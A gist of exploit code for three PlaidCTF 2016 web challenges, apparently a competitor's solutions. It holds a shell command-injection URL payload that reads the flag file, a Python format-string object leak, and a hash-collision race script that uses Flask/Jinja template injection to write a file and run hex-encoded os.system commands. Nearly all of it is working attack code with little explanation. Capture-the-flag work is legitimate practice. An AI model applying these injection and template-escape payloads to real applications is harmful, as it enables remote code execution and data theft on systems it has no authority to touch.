junorouse/plaid-2016-web-challs.md

## plaid-2016-web-challs.md

      
    Raw
  

              plaid-2016-web-challs.md
            
          
    echo

info: command injection at the input.
echo {input}
from requests import get

flag="PCTF{L"

x="""49
53
115
116
51
110
95
84
48
95
95
114
101
101
101
95
114
101
101
101
101
101
101
95
114
101
101
101
95
108
97
125""".split("\n")

for k in x:
	flag += chr(int(k))

print flag
exit(1)

"""
http://echo2.chal.pwning.xxx:9977/audio/13dfdabcb06240b28e9f847877601d94/2.wav
http://echo2.chal.pwning.xxx:9977/audio/91752b54f8fb416faac895ff8698ce81/2.wav
http://echo2.chal.pwning.xxx:9977/audio/0e3bc71c6baa4babb86cdad06690890f/2.wav
http://echo2.chal.pwning.xxx:9977/audio/52018cc316f4416cb9ac041cf25cfeeb/2.wav
http://echo2.chal.pwning.xxx:9977/audio/2ded2beb78b5425297a2fc3067537b06/2.wav
http://echo2.chal.pwning.xxx:9977/audio/43a03f68b3124db08bbb1f0e62a933d8/2.wav
"""

for i in range(7, 50):
	url = "http://echo2.chal.pwning.xxx:9977/?tweet_1=%60head+%2Fshare%2Fflag+-c+"+str(65000*i)+"+%7C+tail+-c+65000+%3E+%2Ftmp%2Fx%60&tweet_2=%60python+-c+%22exec%28%27f%3Dopen%28%5C%27%2Ftmp%2Fx%5C%27%2C+%5C%27rb%5C%27%29%3Bd%3Df.read%28%29%3Bf.close%28%29%3Bj%3D0%3Bc%3D64999%5Cnfor+i+in+range%28c%29%3A+j+%5E%3D+ord%28d%5Bi%5D%29%5Cnprint+j%5Eord%28d%5Bc%5D%29%27%29%22%60&tweet_3=&tweet_4="
	c = get(url)
	x = c.content.split('<h2>Tweet 2</h2>')[1].split('<source src="')[1].split('"')[0]
	print "http://echo2.chal.pwning.xxx:9977/"+x
pykemon

info: format sub function in the rename function.
return "Successfully renamed to:\n" + new_name.format(p)
p is Pykemon object. (p = check(name, 'caught'))
I can get the member of Pykemon object with format.
input: {0.pykemon}
sha4

info: race condition, collision
make_collision.py
from sha4 import hash, seven_to_eight
import struct
from pyasn1.codec.ber.decoder import decode

key1 = bytearray("\x01\x03BBBB{" + "{\x20\x33+\x33\x20\x20" + "\x20}}"+"\x43"+"\x20"*3+""+"AAAAAA{"+"{\x20\x20\x20\x20\x20\x20" + "\x20}}")
key2 = bytearray("\x01\x03BBBBy" + "z\x20\x33+\x33\x20\x20" + "\x20=]"+"\x43"+"\x20"*3+""+"AAAAAAy"+"z\x20\x20\x20\x20\x20\x20" + "\x20=]")

key1 = "0103424242427b7b20332b332020207d7d432020204141414141417b7b20202020202027272e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f28292020207d7d2020202020".decode("hex")
key2 = "010342424242797a20332b332020203d5d43202020414141414141797a20202020202027272e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f28292020203d5d2020202020".decode("hex")
# 010300000041424344

print decode(str(key1))
print decode(str(key2))

print str(key1).encode("hex")
print str(key2).encode("hex")

print hash(key1) == hash(key2)

# print key1 == key2
for i in range(0xff+1):
	key2[16] = i
	if hash(key1) == hash(key2):
		print chr(i), str(i)

# print hash("\x01\x01\x01\x00\x00\x00\x00\x00").encode("hex")


def fuck(x):
  [val] = struct.unpack("Q", x+"\x00")
  print hex(val)
  out = 0
  mask = 0b1111111
  for shift in xrange(8):
    out |= (val & (mask<<(7*shift)))<<shift

  print hex(out)  
  return struct.pack("Q", out)

# fuck("C" + "AAAAAA")
# fuck("C" + "AAAAAA")
poc.py
from requests import post
import threading
from time import time, sleep
import sys

"""
key1 = bytearray("\x01\x03BBBB{" + "{\x20\x33+\x33\x20\x20" + "\x20}}"+"\x20"*4)
key2 = bytearray("\x01\x03BBBBy" + "z\x20\x33+\x33\x20\x20" + "\x20=]"+"\x20"*4)

0103424242427b7b20332b332020207d7d43202020
010342424242797a20332b332020203d5d43202020
"""

def pad(x):
	suck = (len(x)/7)+1
	return x.ljust(7*suck, " ")

def example(fuck):
	url = "http://sha4.chal.pwning.xxx/comments"
	payload = sys.argv[1]
	asdf = sys.argv[2]

	if fuck == True:
		data = {
			# 'comment': '0103424242427b7b20332b332020207d7d43202020'+"ABCDEFG".encode("hex")
			'comment': '0103424242427b7b20332b332020207d7d43202020'+pad(asdf).encode('hex')+'4141414141417b7b202020202020'+pad(payload).encode('hex')+'207d7d2020202020'
		}
	else:
		data = {
			# 'comment': '010342424242797a20332b332020203d5d43202020'+"ABCDEFG".encode("hex")
			'comment': '010342424242797a20332b332020203d5d43202020'+pad(asdf).encode('hex')+'414141414141797a202020202020'+pad(payload).encode("hex")+'203d5d2020202020'
		}

	a1 = time()
	c1 = post(url, data=data)
	# print c1.content
	# return
	if c1.status_code == 200 and c1.content.find("B6") != -1:
		print c1.content
		exit(0)
	# print time()-a1
 

payload = "''.__class__.__mro__[2].__subclasses__()"
print '0103424242427b7b20332b332020207d7d432020204141414141417b7b202020202020'+pad(payload).encode('hex')+'207d7d2020202020'
print '010342424242797a20332b332020203d5d43202020414141414141797a202020202020'+pad(payload).encode("hex")+'203d5d2020202020'
while True:
	th = threading.Thread(target=example, args=(False,))
	th.start()

	th = threading.Thread(target=example, args=(True,))
	th.start()

	# th.join()

# input 93
payload
write code to /var/tmp/comments/junoim
python poc.py "config.__doc__.__class__.mro()[2].__subclasses__()[40](comment[96:144].decode(comment[93:96]), comment[144:146].decode(comment[93:96])).write(comment[147:359].decode(comment[93:96]))" "hex2f7661722f746d702f636f6d6d656e74732f6a756e6f696d77_696d706f7274206f733b6f732e73797374656d2827636174202f7661722f7777772f736861342f666c61675f62696c6161626c75616762696c75617269676c75626c61697265756772706f6f70203e202f7661722f746d702f636f6d6d656e74732f6a756e6f696d2729"

run code via config.frompyfile
python poc.py "config.from_pyfile(comment[96:144].decode(comment[93:96]))" "hex2f7661722f746d702f636f6d6d656e74732f6a756e6f696d77_696d706f7274206f733b6f732e73797374656d28276c732729"

read the flag
python poc.py "config.__doc__.__class__.mro()[2].__subclasses__()[40](comment[96:144].decode(comment[93:96])).read()" "hex2f7661722f746d702f636f6d6d656e74732f6a756e6f696d77_696d706f7274206f733b6f732e73797374656d28276c732729"